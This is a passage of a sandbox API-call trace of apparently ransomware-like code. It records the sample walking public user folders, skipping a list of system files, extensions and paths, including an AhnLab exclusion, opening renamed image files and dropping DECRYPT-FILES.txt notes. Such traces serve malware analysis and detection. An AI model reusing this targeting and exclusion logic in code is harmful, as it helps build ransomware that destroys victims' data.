dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.790] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.790] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.790] CloseHandle (hObject=0x268) returned 1 [0186.790] CloseHandle (hObject=0x264) returned 1 [0186.790] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.791] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb1674620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x89184, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg.0wfrVn", cAlternateFileName="LIGHTH~1.0WF")) returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="DECRYPT-FILES.txt") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="autorun.inf") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="boot.ini") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="desktop.ini") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="ntuser.dat") returned -1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="iconcache.db") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="bootsect.bak") returned 1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="ntuser.dat.log") returned -1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="thumbs.db") returned -1 [0186.791] lstrcmpiW (lpString1="Lighthouse.jpg.0wfrVn", lpString2="Bootfont.bin") returned 1 [0186.791] lstrlenW (lpString="Lighthouse.jpg.0wfrVn") returned 21 [0186.791] lstrcmpiW (lpString1="0wfrVn", lpString2="lnk") returned -1 [0186.791] lstrcmpiW (lpString1="0wfrVn", lpString2="exe") returned -1 [0186.791] lstrcmpiW (lpString1="0wfrVn", lpString2="sys") returned -1 [0186.791] lstrcmpiW (lpString1="0wfrVn", lpString2="dll") returned -1 [0186.791] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.791] lstrlenW (lpString="Lighthouse.jpg.0wfrVn") returned 21 [0186.791] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.791] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Lighthouse.jpg.0wfrVn" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0wfrVn") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0wfrVn" [0186.791] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.791] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0wfrVn" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.0wfrvn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.792] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=561540) returned 1 [0186.792] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.792] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0186.792] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0186.793] CloseHandle (hObject=0x268) returned 1 [0186.793] CloseHandle (hObject=0x264) returned 1 [0186.793] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.793] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb16c08e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbdf73, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg.nRSImkw", cAlternateFileName="")) returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="DECRYPT-FILES.txt") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="autorun.inf") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="boot.ini") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="desktop.ini") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="ntuser.dat") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="iconcache.db") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="bootsect.bak") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="ntuser.dat.log") returned 1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="thumbs.db") returned -1 [0186.793] lstrcmpiW (lpString1="Penguins.jpg.nRSImkw", lpString2="Bootfont.bin") returned 1 [0186.793] lstrlenW (lpString="Penguins.jpg.nRSImkw") returned 20 [0186.793] lstrcmpiW (lpString1="nRSImkw", lpString2="lnk") returned 1 [0186.793] lstrcmpiW (lpString1="nRSImkw", lpString2="exe") returned 1 [0186.793] lstrcmpiW (lpString1="nRSImkw", lpString2="sys") returned -1 [0186.793] lstrcmpiW (lpString1="nRSImkw", lpString2="dll") returned 1 [0186.793] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.793] lstrlenW (lpString="Penguins.jpg.nRSImkw") returned 20 [0186.793] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.793] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Penguins.jpg.nRSImkw" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.nRSImkw") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.nRSImkw" [0186.793] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.794] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.nRSImkw" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.nrsimkw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.794] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=778099) returned 1 [0186.794] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.794] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.795] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.795] CloseHandle (hObject=0x268) returned 1 [0186.795] CloseHandle (hObject=0x264) returned 1 [0186.795] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.795] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb16e6a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x97a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg.gzK7", cAlternateFileName="")) returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="DECRYPT-FILES.txt") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="autorun.inf") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="boot.ini") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="desktop.ini") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="ntuser.dat") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="iconcache.db") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="bootsect.bak") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="ntuser.dat.log") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="thumbs.db") returned 1 [0186.795] lstrcmpiW (lpString1="Tulips.jpg.gzK7", lpString2="Bootfont.bin") returned 1 [0186.795] lstrlenW (lpString="Tulips.jpg.gzK7") returned 15 [0186.795] lstrcmpiW (lpString1="gzK7", lpString2="lnk") returned -1 [0186.795] lstrcmpiW (lpString1="gzK7", lpString2="exe") returned 1 [0186.795] lstrcmpiW (lpString1="gzK7", lpString2="sys") returned -1 [0186.795] lstrcmpiW (lpString1="gzK7", lpString2="dll") returned 1 [0186.795] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0186.795] lstrlenW (lpString="Tulips.jpg.gzK7") returned 15 [0186.795] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.796] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Tulips.jpg.gzK7" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.gzK7") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.gzK7" [0186.796] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.796] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.gzK7" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.gzk7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.796] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=621152) returned 1 [0186.796] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.796] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0186.797] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0186.797] CloseHandle (hObject=0x268) returned 1 [0186.797] CloseHandle (hObject=0x264) returned 1 [0186.797] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.797] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb16e6a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x97a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg.gzK7", cAlternateFileName="")) returned 0 [0186.797] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.797] CloseHandle (hObject=0x25c) returned 1 [0186.797] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb16e6a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb16e6a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures\\", cAlternateFileName="SAMPLE~1")) returned 0 [0186.797] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.797] CloseHandle (hObject=0x254) returned 1 [0186.798] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xb170cba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb170cba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0186.798] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0186.798] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0186.798] lstrcatW (in: lpString1="Recorded TV", lpString2="\\" | out: lpString1="Recorded TV\\") returned="Recorded TV\\" [0186.798] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Recorded TV\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\Program Files") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch=":\\Windows") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\Games\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\All Users") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="AhnLab") returned 0x0 [0186.798] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.798] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\") returned 28 [0186.798] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.798] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\\\0a16c9.tmp") returned 39 [0186.798] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\recorded tv\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.802] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\") returned 28 [0186.802] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.802] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\\\DECRYPT-FILES.txt") returned 46 [0186.802] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.802] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\") returned 28 [0186.802] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\*") returned="C:\\Users\\Public\\Recorded TV\\*" [0186.802] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf20b5ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20b5ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.802] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf20b5ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20b5ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.802] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.803] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf20b5ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf20b5ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf20b5ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.803] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.803] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.803] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.803] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.803] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.803] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.803] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\") returned 28 [0186.803] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.803] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Recorded TV\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0186.803] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Recorded TV\\0a16c9.tmp") returned="C:\\Users\\Public\\Recorded TV\\0a16c9.tmp" [0186.803] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.803] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\0a16c9.tmp" (normalized: "c:\\users\\public\\recorded tv\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.804] CloseHandle (hObject=0x0) returned 0 [0186.804] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.804] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb16e6a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb16e6a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb170cba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.804] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.804] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.804] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.804] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.804] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.804] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.804] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xb196e1a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb196e1a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0186.804] lstrcmpW (lpString1="Sample Media", lpString2=".") returned 1 [0186.804] lstrcmpW (lpString1="Sample Media", lpString2="..") returned 1 [0186.804] lstrcatW (in: lpString1="Sample Media", lpString2="\\" | out: lpString1="Sample Media\\") returned="Sample Media\\" [0186.804] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\Program Files") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch=":\\Windows") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\Games\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\All Users") returned 0x0 [0186.804] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.805] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.805] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.805] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="AhnLab") returned 0x0 [0186.805] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.805] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0186.805] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.805] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\0a16c9.tmp") returned 52 [0186.805] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\recorded tv\\sample media\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.807] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 41 [0186.807] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.807] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: 